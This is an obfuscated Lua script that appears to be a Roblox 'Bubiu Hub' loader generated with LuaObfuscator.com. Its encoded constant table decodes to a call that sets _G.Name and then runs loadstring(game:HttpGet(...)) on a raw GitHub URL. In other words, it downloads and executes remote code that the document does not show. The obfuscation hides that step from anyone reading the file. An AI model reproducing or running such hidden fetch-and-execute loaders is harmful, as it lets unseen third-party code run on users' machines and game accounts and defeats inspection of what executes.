--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-((1997 -(68 + 997)) -((2127 -(226 + 1044)) + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=(1 + (4 -3))^(v32-((1 -0) + 0)) ;return (((v31%(v86 + v86))>=v86) and ((995 -(32 + 85)) -(282 + 595))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * (16777566 -(64 + 23 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + (270 -202))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;v37=2 -1 ;end end end local function v24()local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 -1)) then v45=1;v46=(v20(v44,1 -0 ,15 + 5 ) * ((774 -(201 + 571))^(1029 -(915 + 82)))) + v43 ;v42=5 -3 ;end if (v42==(2 + 0)) then v47=v20(v44,(1165 -(116 + 1022)) -6 ,31);v48=((v20(v44,1219 -(1069 + 118) )==1) and  -(2 -1)) or (1 -0) ;v42=1 + 2 ;end if (v42==(4 -1)) then if (v47==((0 -0) + 0)) then if (v46==(791 -(368 + 249 + 174))) then return v48 * (0 -0) ;else local v103=18 -(10 + (29 -21)) ;while true do if (v103==(0 -0)) then v47=1;v45=442 -(416 + (92 -66)) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * (((860 -(814 + 45)) -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-((3580 -2127) -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end if (v42==0) then v43=v23();v44=v23();v42=1 + 0 + 0 ;end end end local function v25(v49)local v50=0 + (1055 -(87 + 968)) ;local v51;local v52;while true do if (v50==(888 -(261 + 624))) then return v6(v52);end if (v50==(766 -(745 + 21))) then v51=nil;if  not v49 then local v96=0 -(0 -0) ;while true do if (v96==0) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=1424 -(630 + 793) ;end if (v50==2) then v52={};for v90=3 -2 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=14 -11 ;end if (v50==(1 + 0 + 0)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=1749 -(760 + 987) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==1) then v56=nil;v57=nil;v53=4 -2 ;end if (v53==(165 -(92 + 71))) then v58=nil;v59=nil;v53=2 + 1 ;end if ((2 + 1)==v53) then v60=nil;v61=nil;v53=4;end if (v53==(850 -(20 + 830))) then v54=0;v55=nil;v53=1;end if (4==v53) then while true do if (v54~=(768 -(574 + 191))) then else v61=nil;while true do local v104=0;local v105;while true do if (v104==(0 + 0)) then v105=126 -(116 + 10) ;while true do if (v105==(0 + 0)) then local v115=738 -(542 + 196) ;while true do if (v115==1) then v105=1 + 0 ;break;end if (v115~=(0 -0)) then else if (v55~=(0 + 0)) then else local v167=0 + 0 ;local v168;local v169;while true do if (v167==1) then while true do if (v168==(0 + 0)) then v169=0;while true do if (v169~=1) then else local v185=0 -0 ;local v186;while true do if (v185==(126 -(55 + 71))) then v186=0 -0 ;while true do if (v186==(1791 -(573 + 1217))) then v169=2;break;end if (v186==(0 -0)) then local v200=1551 -(1126 + 425) ;while true do if ((406 -(118 + 287))==v200) then v186=940 -(714 + 225) ;break;end if (v200==0) then v58={};v59={v56,v57,nil,v58};v200=1122 -(118 + 1003) ;end end end end break;end end end if (v169~=(0 -0)) then else local v187=377 -(142 + 235) ;while true do if ((0 -0)==v187) then local v190=0 + 0 ;while true do if ((977 -(553 + 424))==v190) then v56={};v57={};v190=807 -(118 + 688) ;end if (v190~=1) then else v187=1 -0 ;break;end end end if (v187~=1) then else v169=1 + 0 ;break;end end end if (v169==(50 -(25 + 23))) then v55=1 + 0 ;break;end end break;end end break;end if (v167==(0 + 0)) then v168=0;v169=nil;v167=1 + 0 ;end end end if (v55~=(1 + 1)) then else local v170=0 -0 ;local v171;local v172;while true do if ((0 + 0)~=v170) then else v171=0 -0 ;v172=nil;v170=2 -1 ;end if (v170==(2 -1)) then while true do if (v171==(0 + 0)) then v172=0 -0 ;while true do if ((754 -(239 + 514))==v172) then return v59;end if (0==v172) then local v188=285 -(175 + 110) ;local v189;while true do if ((0 + 0)==v188) then v189=0 -0 ;while true do if ((1797 -(503 + 1293))==v189) then v172=1330 -(797 + 532) ;break;end if (0==v189) then local v201=0 + 0 ;while true do if (v201==(0 -0)) then for v202=1,v23() do local v203=0 + 0 ;local v204;local v205;while true do if (v203~=(1062 -(810 + 251))) then else while true do if (v204==(0 -0)) then v205=v21();if (v20(v205,1,1)==0) then local v213=0 + 0 ;local v214;local v215;local v216;while true do if (v213~=(1203 -(373 + 829))) then else local v217=731 -(476 + 255) ;while true do if (v217==1) then v213=1132 -(369 + 761) ;break;end if (0~=v217) then else v216={v22(),v22(),nil,nil};if (v214==(0 + 0)) then local v226=0 -0 ;local v227;while true do if (v226==(0 -0)) then v227=0;while true do if (v227==(0 -0)) then v216[1747 -(1344 + 400) ]=v22();v216[4]=v22();break;end end break;end end elseif (v214==1) then v216[408 -(255 + 150) ]=v23();elseif (v214==(240 -(64 + 174))) then v216[2 + 1 ]=v23() -((1 + 1)^(51 -35)) ;elseif (v214~=(1742 -(404 + 1335))) then else local v237=0;local v238;while true do if (v237==(0 -0)) then v238=336 -(144 + 192) ;while true do if (v238~=(0 -0)) then else v216[219 -(42 + 174) ]=v23() -((2 + 0)^(14 + 2)) ;v216[2 + 2 ]=v22();break;end end break;end end end v217=1505 -(363 + 1141) ;end end end if (v213==(1582 -(1183 + 397))) then local v218=337 -(10 + 327) ;local v219;while true do if (v218==0) then v219=0 -0 ;while true do if (v219==(0 + 0)) then if (v20(v215,1 + 0 ,1 + 0 )==(1976 -(1913 + 62))) then v216[2 + 0 ]=v61[v216[5 -3 ]];end if (v20(v215,1935 -(565 + 1368) ,7 -5 )==(1662 -(1477 + 184))) then v216[3 -0 ]=v61[v216[2 + 1 ]];end v219=4 -3 ;end if (v219~=(1 + 0)) then else v213=859 -(564 + 292) ;break;end end break;end end end if (v213~=3) then else if (v20(v215,1496 -(711 + 782) ,4 -1 )~=(470 -(270 + 199))) then else v216[11 -7 ]=v61[v216[4]];end v56[v202]=v216;break;end if (v213==(304 -(244 + 60))) then local v221=0 + 0 ;while true do if (v221==1) then v213=477 -(41 + 435) ;break;end if (v221==(1001 -(938 + 63))) then v214=v20(v205,2 + 0 ,1128 -(936 + 189) );v215=v20(v205,2 + 2 ,6 + 0 );v221=1 + 0 ;end end end end end break;end end break;end if (v203==(0 + 0)) then v204=1613 -(1565 + 48) ;v205=nil;v203=1 + 0 ;end end end for v206=1168 -(645 + 522) ,v23() do v57[v206-1 ]=v28();end v201=1139 -(782 + 356) ;end if (v201~=1) then else v189=268 -(176 + 91) ;break;end end end end break;end end end end break;end end break;end end end v115=2 -1 ;end end end if (v105==(1 -0)) then if (v55==(1093 -(975 + 117))) then local v134=0;local v135;local v136;while true do if (v134==1) then while true do if (v135==(0 -0)) then v136=1875 -(157 + 1718) ;while true do if ((1 + 0)==v136) then local v181=0 -0 ;local v182;while true do if ((0 -0)==v181) then v182=1018 -(697 + 321) ;while true do if (v182==0) then for v193=1837 -(1045 + 791) ,v60 do local v194=0 -0 ;local v195;local v196;local v197;local v198;local v199;while true do if (v194~=(3 -1)) then else v199=nil;while true do if (v195==(0 -0)) then v196=0 -0 ;v197=nil;v195=1 + 0 ;end if (v195==(1575 -(1281 + 293))) then local v208=0 -0 ;while true do if (v208==0) then v198=nil;v199=nil;v208=2 -1 ;end if (v208~=1) then else v195=1229 -(322 + 905) ;break;end end end if (v195~=2) then else while true do if ((1559 -(1381 + 178))~=v196) then else local v209=611 -(602 + 9) ;while true do if (v209==0) then v197=0 + 0 ;v198=nil;v209=1190 -(449 + 740) ;end if ((873 -(826 + 46))~=v209) then else v196=1;break;end end end if (v196~=1) then else v199=nil;while true do if (v197==(948 -(245 + 702))) then if (v198==1) then v199=v21()~=(0 -0) ;elseif (v198==(472 -(381 + 89))) then v199=v24();elseif (v198==(3 + 0)) then v199=v25();end v61[v193]=v199;break;end if ((0 + 0)~=v197) then else local v211=1898 -(260 + 1638) ;local v212;while true do if ((0 -0)==v211) then v212=440 -(382 + 58) ;while true do if (v212~=(3 -2)) then else v197=1 + 0 ;break;end if (v212~=(0 -0)) then else local v222=0;local v223;while true do if (v222~=(1784 -(214 + 1570))) then else v223=1455 -(990 + 465) ;while true do if (v223==(1 -0)) then v212=1 + 0 ;break;end if (v223~=(0 -0)) then else local v229=1205 -(902 + 303) ;while true do if (v229==(1 -0)) then v223=1;break;end if (v229~=(0 -0)) then else v198=v21();v199=nil;v229=1 + 0 ;end end end end break;end end end end break;end end end end break;end end break;end end break;end if (v194~=1) then else v197=nil;v198=nil;v194=2;end if (v194~=(1690 -(1121 + 569))) then else v195=0 -0 ;v196=nil;v194=1;end end end v59[217 -(22 + 192) ]=v21();v182=684 -(483 + 200) ;end if (v182==1) then v136=1465 -(1404 + 59) ;break;end end break;end end end if (v136~=(0 -0)) then else local v183=0;local v184;while true do if (v183==(0 -0)) then v184=0 + 0 ;while true do if (v184==(0 + 0)) then local v192=0 + 0 ;while true do if (v192==(0 -0)) then v60=v23();v61={};v192=1995 -(109 + 1885) ;end if (v192==(766 -(468 + 297))) then v184=1;break;end end end if (v184==1) then v136=563 -(334 + 228) ;break;end end break;end end end if (2==v136) then v55=6 -4 ;break;end end break;end end break;end if (v134~=(815 -(98 + 717))) then else v135=0;v136=nil;v134=2 -1 ;end end end break;end end break;end end end break;end if (v54~=(0 -0)) then else local v99=0 + 0 ;while true do if (v99~=(236 -(141 + 95))) then else v55=0;v56=nil;v99=1;end if (v99~=(1 + 0)) then else v54=1;break;end end end if (v54==(2 -0)) then local v100=0;local v101;while true do if (v100~=(0 -0)) then else v101=0 + 0 ;while true do if (v101~=1) then else v54=3 + 0 ;break;end if (v101==(0 -0)) then local v111=0 + 0 ;while true do if (v111~=(2 -1)) then else v101=3 -2 ;break;end if (v111==0) then v59=nil;v60=nil;v111=2 -1 ;end end end end break;end end end if (v54~=1) then else local v102=0 + 0 ;while true do if (v102==(1 + 0)) then v54=2 + 0 ;break;end if (v102~=(0 -0)) then else v57=nil;v58=nil;v102=1;end end end end break;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then local v106=v80[2];local v107,v108=v71(v78[v106](v13(v78,v106 + 1 ,v80[3])));v73=(v108 + v106) -1 ;local v109=0;for v112=v106,v73 do v109=v109 + 1 ;v78[v112]=v107[v109];end elseif (v81==1) then local v116=0;local v117;while true do if (v116==0) then v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));break;end end else local v118=0;local v119;local v120;while true do if (v118==0) then v119=v80[2];v120=v78[v80[3]];v118=1;end if (v118==1) then v78[v119 + 1 ]=v120;v78[v119]=v120[v80[4]];break;end end end elseif (v81<=3) then do return;end elseif (v81>4) then v78[v80[2]]=v80[3];else local v123=0;local v124;local v125;local v126;local v127;local v128;while true do if (v123==3) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v125,v126=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v123=4;end if (v123==4) then v73=(v126 + v128) -1 ;v124=0;for v165=v128,v73 do local v166=0;while true do if (v166==0) then v124=v124 + 1 ;v78[v165]=v125[v124];break;end end end v72=v72 + 1 ;v80=v68[v72];v128=v80[2];v123=5;end if (v123==5) then v78[v128]=v78[v128](v13(v78,v128 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v123=6;end if (6==v123) then v72=v80[3];break;end if (2==v123) then v80=v68[v72];v128=v80[2];v127=v78[v80[3]];v78[v128 + 1 ]=v127;v78[v128]=v127[v80[4]];v72=v72 + 1 ;v123=3;end if (1==v123) then v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;v123=2;end if (v123==0) then v124=nil;v125,v126=nil;v127=nil;v128=nil;v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v123=1;end end end elseif (v81<=8) then if (v81<=6) then v72=v80[3];elseif (v81>7) then v78[v80[2]]();else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=9) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81>10) then for v132=v80[2],v80[3] do v78[v132]=nil;end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703043O004E616D6503093O00427562697520487562030A3O006C6F6164737472696E6703043O0047616D6503073O00482O7470476574035C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D5469656E4E677579656E5A2F4E677579656E5469656E53696D70526F73652F6D61696E2F4E677579656E4D696E685469656E4C6F6164657200153O0012053O00014O000B000100013O0026093O0002000100010004063O00020001001205000100013O00260900010005000100010004063O0005000100120A000200023O00300400020003000400122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001400010004063O000500010004063O001400010004063O000200012O00033O00017O00",v9(),...);